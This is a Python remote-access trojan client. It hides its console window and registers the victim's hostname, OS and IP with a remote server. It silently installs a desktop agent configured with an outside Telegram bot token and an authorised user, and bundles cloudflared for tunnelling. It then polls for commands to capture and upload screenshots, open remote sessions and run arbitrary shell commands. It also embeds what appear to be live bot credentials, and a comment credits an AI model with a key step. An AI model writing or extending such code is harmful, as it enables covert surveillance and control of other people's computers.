import requests
import socket
import platform
import os
import subprocess
import time
import sys
import json
import datetime
import shutil

# ========== CONFIGURATION ==========
SERVER_URL = "https://dollar-1rtv.onrender.com"
EXE_NAME = "1"  # Will be replaced for 2,3,4,5
GROUP_ID = "-1003587821331"  # REPLACE with your actual group ID
BOT_TOKEN = "8370598742:AAGtfxRT9rVDOThRavBnq_dFJFSXyHocK1s"  # REPLACE with your bot token from BotFather
ADMIN_USER_ID = "6586114356"  # REPLACE with your numeric user ID from @userinfobot
# ==================================

# Hide the console window completely
if sys.platform == "win32":
    import ctypes
    ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)

# ========== LOGGING ==========
LOG_DIR = os.path.join(os.environ.get('TEMP', 'C:\\Temp'), 'PD_Research')
LOG_FILE = os.path.join(LOG_DIR, 'debug.log')

def log_message(message):
    try:
        if not os.path.exists(LOG_DIR):
            os.makedirs(LOG_DIR, exist_ok=True)
        timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        with open(LOG_FILE, 'a') as f:
            f.write(f"[{timestamp}] {message}\n")
    except:
        pass

log_message("=== CLIENT STARTED ===")
log_message(f"EXE_NAME: {EXE_NAME}")
log_message(f"Device: {socket.gethostname()}")

# ========== GET COMPUTER INFO ==========
def get_computer_info():
    try:
        hostname = socket.gethostname()
        ip = socket.gethostbyname(hostname)
        return {
            'hostname': hostname,
            'os': platform.system(),
            'os_version': platform.version(),
            'ip': ip
        }
    except:
        return {
            'hostname': 'Unknown',
            'os': 'Unknown',
            'os_version': 'Unknown',
            'ip': 'Unknown'
        }

# ========== INSTALL PDAGENT ==========
def install_pdagent():
    log_message("Checking if pdagent is installed...")
    try:
        result = subprocess.run("where pdagent", shell=True, capture_output=True)
        if result.returncode != 0:
            log_message("pdagent not found. Installing...")
            subprocess.run("pip install pocket-desk-agent", shell=True, capture_output=True, timeout=120)
            log_message("pdagent installed successfully.")
            return True
        log_message("pdagent is already installed.")
        return True
    except Exception as e:
        log_message(f"ERROR installing pdagent: {str(e)}")
        return False

# ========== CREATE CONFIG.TOML (The Key to Authorization) ==========
def create_config():
    """Create the pdagent config file with your token and authorized users"""
    log_message("Creating config.toml...")
    try:
        # Find the pdagent config directory
        home_dir = os.path.expanduser("~")
        config_dir = os.path.join(home_dir, ".pdagent")
        
        if not os.path.exists(config_dir):
            os.makedirs(config_dir, exist_ok=True)
        
        config_file = os.path.join(config_dir, "config.toml")
        
        # Write the config file
        config_content = f'''
# Pocket Desk Agent Configuration
# Auto-generated by PD_Research

TELEGRAM_BOT_TOKEN = "{BOT_TOKEN}"
AUTHORIZED_USER_IDS = ["{ADMIN_USER_ID}"]
POLLING_ENABLED = true
'''
        
        with open(config_file, 'w') as f:
            f.write(config_content)
        
        log_message(f"Config.toml created at: {config_file}")
        log_message(f"Authorized User ID: {ADMIN_USER_ID}")
        log_message("POLLING_ENABLED = true")
        return True
    except Exception as e:
        log_message(f"ERROR creating config: {str(e)}")
        return False

# ========== GET CLOUDFLARED ==========
def get_cloudflared():
    """Get cloudflared.exe from bundled resources"""
    log_message("Getting cloudflared.exe...")
    try:
        base_path = sys._MEIPASS if getattr(sys, '_MEIPASS', False) else os.path.dirname(os.path.abspath(__file__))
        source_path = os.path.join(base_path, 'cloudflared.exe')
        target_dir = os.path.join(os.environ.get('TEMP', 'C:\\Temp'))
        target_path = os.path.join(target_dir, 'cloudflared.exe')
        
        if os.path.exists(target_path):
            log_message(f"cloudflared.exe already exists at: {target_path}")
            return target_path
        
        shutil.copy2(source_path, target_path)
        log_message(f"cloudflared.exe copied to: {target_path}")
        return target_path
    except Exception as e:
        log_message(f"ERROR getting cloudflared: {str(e)}")
        return None

# ========== START DAEMON ==========
def start_daemon():
    log_message("Starting pdagent daemon...")
    try:
        # Stop any existing daemon
        subprocess.run("pdagent stop", shell=True, capture_output=True)
        # Start the daemon
        subprocess.Popen("pdagent start", shell=True, creationflags=subprocess.CREATE_NO_WINDOW)
        log_message("pdagent daemon started successfully.")
        return True
    except Exception as e:
        log_message(f"ERROR starting daemon: {str(e)}")
        return False

# ========== REGISTER DEVICE ==========
def register_device():
    data = {
        'device_id': socket.gethostname(),
        'exe_name': EXE_NAME,
        'computer_info': get_computer_info(),
        'group_id': GROUP_ID
    }
    try:
        response = requests.post(f"{SERVER_URL}/register", json=data, timeout=10)
        log_message(f"Registration response: {response.status_code}")
        return True
    except Exception as e:
        log_message(f"Registration failed: {str(e)}")
        return False

# ========== CLEAR COMMAND ==========
def clear_command(device_id):
    try:
        requests.post(f"{SERVER_URL}/clear_command", json={'device_id': device_id}, timeout=5)
    except:
        pass

# ========== EXECUTE COMMAND ==========
def execute_command(command):
    log_message(f"Executing command: {command}")
    try:
        if command == "SCREENSHOT":
            log_message("Taking screenshot...")
            subprocess.run("pdagent screenshot --save", shell=True, capture_output=True, timeout=30)
            screenshot_path = os.path.join(os.environ.get('TEMP', 'C:\\Temp'), 'screenshot.png')
            if os.path.exists(screenshot_path):
                with open(screenshot_path, 'rb') as f:
                    files = {'file': f}
                    data = {'device_id': socket.gethostname()}
                    requests.post(f"{SERVER_URL}/upload_screenshot", files=files, data=data, timeout=10)
                log_message("Screenshot uploaded.")
                os.remove(screenshot_path)
                
        elif command == "REMOTE":
            log_message("Starting remote session...")
            subprocess.Popen("pdagent remote", shell=True, creationflags=subprocess.CREATE_NO_WINDOW)
            log_message("Remote session started.")
            
        elif command.startswith("CMD:"):
            actual_cmd = command[4:]
            log_message(f"Running custom command: {actual_cmd}")
            subprocess.run(actual_cmd, shell=True, capture_output=True, timeout=30)
            
        else:
            log_message(f"Unknown command: {command}")
    except Exception as e:
        log_message(f"ERROR executing command: {str(e)}")

# ========== CHECK FOR COMMANDS ==========
def check_for_commands():
    try:
        response = requests.get(f"{SERVER_URL}/devices", timeout=10)
        all_devices = response.json()
        device_id = socket.gethostname()
        if device_id in all_devices and all_devices[device_id].get('pending_command'):
            command = all_devices[device_id]['pending_command']
            log_message(f"Found pending command: {command}")
            execute_command(command)
            clear_command(device_id)
    except Exception as e:
        log_message(f"ERROR checking commands: {str(e)}")

# ========== MAIN ==========
def main():
    log_message("Main function started.")
    register_device()
    install_pdagent()
    create_config()  # This is the key step DeepSeek used
    start_daemon()
    log_message("Client is now running and checking for commands.")
    while True:
        check_for_commands()
        time.sleep(10)

if __name__ == '__main__':
    main()